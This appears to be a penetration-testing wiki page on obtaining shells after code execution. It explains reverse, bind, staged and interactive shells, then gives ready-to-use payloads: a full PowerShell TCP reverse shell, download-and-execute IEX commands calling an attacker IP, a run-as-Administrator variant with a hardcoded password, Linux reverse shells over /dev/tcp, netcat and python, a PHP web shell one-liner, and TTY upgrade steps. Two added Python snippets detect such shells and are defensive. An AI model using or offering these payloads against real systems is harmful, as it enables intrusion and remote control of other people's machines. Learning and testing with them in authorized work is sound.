Shells

Introduction

If you have successfully exploited a vulnerability on a system and gained Remote Code Execution (RCE), you can use it to obtain a shell on the remote system.

Types of shell

Depending on the direction of the connection, whether the shell is interactive and whether the payload is staged, shells can be classified into the following categories.

Reverse & bind shell

Reverse shells

Reverse shells are when the target is forced to execute code that connects back to your computer. Reverse shells are an excellent way to bypass firewall rules that may prevent you from connecting to arbitrary ports on the target. However, when receiving a reverse shell from a machine across the Internet, you must configure your own network or use third-party tools to obtain the shell.

Bind Shells

Bind shells are when the code executed is used to start a listener port attached to a shell directly on the target. In some cases, this port would be accessible through the Internet or would require configuring the target network to allow port forwarding for that specific port. Then, you can connect to the port gaining remote code execution. This has the advantage of not requiring any local network configuration but may be prevented by firewalls protecting the target.

Staged & Stageless

Staged payloads

Staged payloads are sent in two parts:

  • The first part is called the stager. It does not contain the shellcode itself; it is executed directly on the target and connects back to the attacker to download the actual payload.

  • The second part is the actual payload, which the stager executes directly in memory, so it is never stored on disk where traditional anti-virus would catch it.

Staged payloads require a particular listener, usually the Metasploit multi/handler, which is capable of sending the different stages and retrieving the final reverse shell.

Stageless payloads

Stageless payloads are entirely self-contained in one piece of code, which sends a shell back immediately to the waiting listener when executed.

Note: To differentiate between staged and stageless payloads in Metasploit and msfvenom, look at the payload name: staged payloads look like windows/shell/reverse_tcp, whereas stageless ones look like windows/shell_reverse_tcp.

Interactive & non-Interactive

Interactive shell

Interactive shells allow you to interact with programs like vim, nano and sudo and to use key combinations like [Ctrl]+c and [Ctrl]+l. Examples of interactive shells are PowerShell, Bash, Zsh and sh.

Non-Interactive shell

Non-interactive shells limit the attacker to programs that do not require user interaction, such as grep, whoami or cat. Unfortunately, the majority of simple reverse and bind shells are of this type, which makes further exploitation trickier.

Nonetheless, we can upgrade a non-interactive shell into a full TTY one depending on the environment.

Payload resources

In this subsection, you can find a list of web pages with payloads for obtaining reverse or web shells.

Reverse Shells

Windows

# shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("<YOUR_IP>",<LISTENING_PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# COMMAND
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1')"

  • Start a shell in a new process.

Start-Process -NoNewWindow powershell "iex (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>/shell.ps1')"

  • Start a process as another user.

# Store user's credentials as variables
$pass = ConvertTo-SecureString 'Go1Ln5z63z&Tg.' -asplaintext -force
$cred = New-Object System.Management.Automation.PSCredential('Administrator', $pass)
# Launch a process
Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://<YOUR_IP>/shell.ps1')" -Credential $cred

  • Netcat

# https://github.com/int0x33/nc.exe/raw/master/nc64.exe
nc.exe -e cmd.exe <YOUR_IP> <LISTENING_PORT>

Linux

bash -i >& /dev/tcp/<YOUR_IP>/<LISTENING_PORT> 0>&1
nc -e /bin/sh <YOUR_IP> <LISTENING_PORT>
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <YOUR_IP> <LISTENING_PORT> > /tmp/f
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR_IP>",<LISTENING_PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
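From the defender's side, the Linux one-liners above leave two footprints on the host: a recognisable command line, and a shell process whose stdin/stdout/stderr are a socket instead of a pty. The following added example (not from the original page) walks a /proc tree and flags both; it builds a constructed /proc snapshot in a temporary directory so it runs offline, and the pid numbers, socket inode and 203.0.113.5 address are made up.

```python
import os, re, tempfile

SHELLS = {"sh", "bash", "dash", "zsh", "python", "python3", "nc", "ncat"}
# Command-line indicators taken from the Linux payloads listed above.
PATTERNS = [re.compile(r"/dev/tcp/"),                 # bash -i >& /dev/tcp/...
            re.compile(r"\bnc\b.*\s-e\s"),            # nc -e /bin/sh
            re.compile(r"mkfifo\s+\S+.*\|\s*nc\b"),   # mkfifo ... | nc
            re.compile(r"os\.dup2\(")]                # python socket one-liner

def socket_stdio(proc_root, pid):
    """Return the stdio fds (0, 1, 2) whose /proc/<pid>/fd link points at a socket."""
    hits = []
    for fd in ("0", "1", "2"):
        try:
            if os.readlink(os.path.join(proc_root, pid, "fd", fd)).startswith("socket:"):
                hits.append(int(fd))
        except OSError:
            pass  # fd closed or process gone
    return hits

def find_suspect_shells(proc_root="/proc"):
    """Map pid -> (cmdline, reasons) for processes that look like reverse/bind shells."""
    findings = {}
    for pid in filter(str.isdigit, os.listdir(proc_root)):
        try:  # cmdline is NUL-separated; the process may exit between listdir and read
            with open(os.path.join(proc_root, pid, "cmdline"), "rb") as f:
                cmd = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue
        reasons = ["cmdline matches " + p.pattern for p in PATTERNS if p.search(cmd)]
        fds = socket_stdio(proc_root, pid)
        if fds and os.path.basename(cmd.split(" ", 1)[0]) in SHELLS:
            reasons.append("stdio fds %s are sockets" % fds)
        if reasons:
            findings[pid] = (cmd, reasons)
    return findings

def build_fake_proc():
    """Constructed /proc snapshot: bash on a pty (benign), sh on a socket, a /dev/tcp one-liner."""
    root = tempfile.mkdtemp()
    procs = {"101": (b"bash\0", "/dev/pts/0"),
             "202": (b"/bin/sh\0-i\0", "socket:[48213]"),
             "303": (b"bash\0-c\0bash -i >& /dev/tcp/203.0.113.5/4444 0>&1\0", "/dev/null")}
    for pid, (cmd, target) in procs.items():
        os.makedirs(os.path.join(root, pid, "fd"))
        with open(os.path.join(root, pid, "cmdline"), "wb") as f:
            f.write(cmd)
        for fd in ("0", "1", "2"):  # every stdio fd points at the same target
            os.symlink(target, os.path.join(root, pid, "fd", fd))
    return root
```

On a real host call find_suspect_shells() with the default "/proc" as root; the socket check catches shells regardless of how they were launched, while the command-line patterns only catch the unobfuscated forms shown on this page.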

Generators & cheat sheets

Web Shells

By default, Kali Linux ships a set of web shells under /usr/share/webshells/. Nevertheless, here is a list with more web shell payloads:

Very simple webshell.

<?=`$_GET[c]`?>
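The one-liner above is tiny, but it has a recognisable shape: a request superglobal fed straight into the backtick operator. As an added example (not part of the original page), here is a small signature scan a defender can run over a web root to catch that shape and its exec-function cousins; the rule names and the three sample files are constructed for the demo.

```python
import re

REQUEST = r"\$_(GET|POST|REQUEST|COOKIE)\b"
# Execution sinks: the backtick operator used by the one-liner above plus the
# PHP functions that hand a string to a shell or to eval.
SINKS = r"\b(eval|system|exec|shell_exec|passthru|popen|proc_open)\s*\("

RULES = {
    "backtick-on-request-input": re.compile(r"`[^`]*" + REQUEST),
    "exec-sink-on-request-input": re.compile(SINKS + r"[^;]*?" + REQUEST),
    "short-echo-tag-backtick": re.compile(r"<\?=\s*`"),
}

def scan_php(src):
    """Return the sorted names of the rules that fire on one PHP source text."""
    return sorted(name for name, rx in RULES.items() if rx.search(src))

def scan_files(files):
    """files: {path: source}; returns only the paths with at least one hit."""
    out = {}
    for path, src in files.items():
        hits = scan_php(src)
        if hits:
            out[path] = hits
    return out

# Constructed samples: the page's one-liner, a shell_exec variant, and a benign
# page that reads $_GET but only ever echoes it escaped.
SAMPLES = {
    "oneliner.php": "<?=`$_GET[c]`?>",
    "upload.php": "<?php echo '<pre>' . shell_exec($_POST['c']) . '</pre>'; ?>",
    "hello.php": "<?php echo 'Hi ' . htmlspecialchars($_GET['name'], ENT_QUOTES); ?>",
}
```

Obfuscated shells (base64-encoded bodies, variable functions, input read from headers) slip past a pattern set this small, so pair it with file-integrity monitoring of the web root rather than relying on it alone.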

Fully TTY

Depending on the target operating system, spawning a TTY shell is achieved differently.

Linux

A simple way to spawn a TTY shell on Linux is to execute the following commands. Nonetheless, you can find more ways to obtain a fully TTY shell in the following link.

python3 -c "import pty; pty.spawn('/bin/bash')"   # in the remote shell
<Ctrl+z>                                          # on your own terminal: background the listener
stty raw -echo; fg                                # on your own terminal, then foreground it again
reset                                             # back in the remote shell; answer the terminal-type prompt with:
screen
export TERM=screen;export SHELL=/bin/bash;        # in the remote shell
stty rows <ROWS> columns <COLUMNS>                # in the remote shell, using your terminal's size

Note: To obtain the number of rows and columns of your terminal type stty -a.

Windows

On Windows it is not possible to obtain a fully interactive TTY shell. However, we can get something similar, even though it is still not truly interactive.

Thanks to rlwrap, the attacker can edit commands before sending them and have a command history.

rlwrap nc -nvlp <LISTENING_PORT>

Another more elaborate alternative is using ConPtyShell, a fully interactive reverse shell for Windows. However, it can be detected by AVs.

Jump from x86 to x64 (PowerShell)

To check whether you are running in a 32-bit or a 64-bit process:

[Environment]::Is64BitProcess

[IntPtr]::Size

  • If the pointer size == 4 -> 32-bit

  • If the pointer size == 8 -> 64-bit

To jump to a 64-bit process, launch the following PowerShell executable.

# It might not exist
C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe
# Then try this one
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Finally, if you want to jump from an x64 to an x86 process, you can use:

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
